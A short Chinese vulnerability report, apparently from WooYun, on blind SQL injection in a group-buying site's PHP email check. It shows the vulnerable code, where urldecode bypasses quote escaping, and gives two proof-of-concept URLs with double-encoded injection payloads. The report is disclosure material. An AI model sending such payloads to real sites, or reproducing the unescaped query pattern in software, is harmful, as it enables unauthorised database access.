当没有整合uc时,造成可以利用的盲注点 function CheckEmail(){ $email=trim(urldecode($this->Get['email'])); $this->DatabaseHandler->SetTable(TABLE_PREFIX.'system_members'); $is_exists=$this->DatabaseHandler->Select('',"email='{$email}'"); if (UCENTER) { include_once(UC_CLIENT_ROOT . './client.php'); $check_result = uc_user_checkemail($email); if ($check_result < 1) { echo '1';exit; } } if($is_exists!=false) { echo '1'; } else { echo '0'; } 可以看出 urldecode 解码可以绕过GPC。 当没有整合UC时,存在输出0,不存在输出1,造成盲入,同文件username的检查也同样存在这样的 漏洞 。 漏洞证明:http://HdhCmsTest2cto测试数据 /tt/ajax.php?mod=check&code=email&email=asdfs%2527%20or%201=1%23 http://HdhCmsTest2cto测试数据 /tt/ajax.php?mod=check&code=email&email=asdfs%2527%20or%201=2%23 修复方案:您懂得! 作者 kobin97@乌云
查看更多关于天天团购网盲注 - 网站安全 - 自学php的详细内容...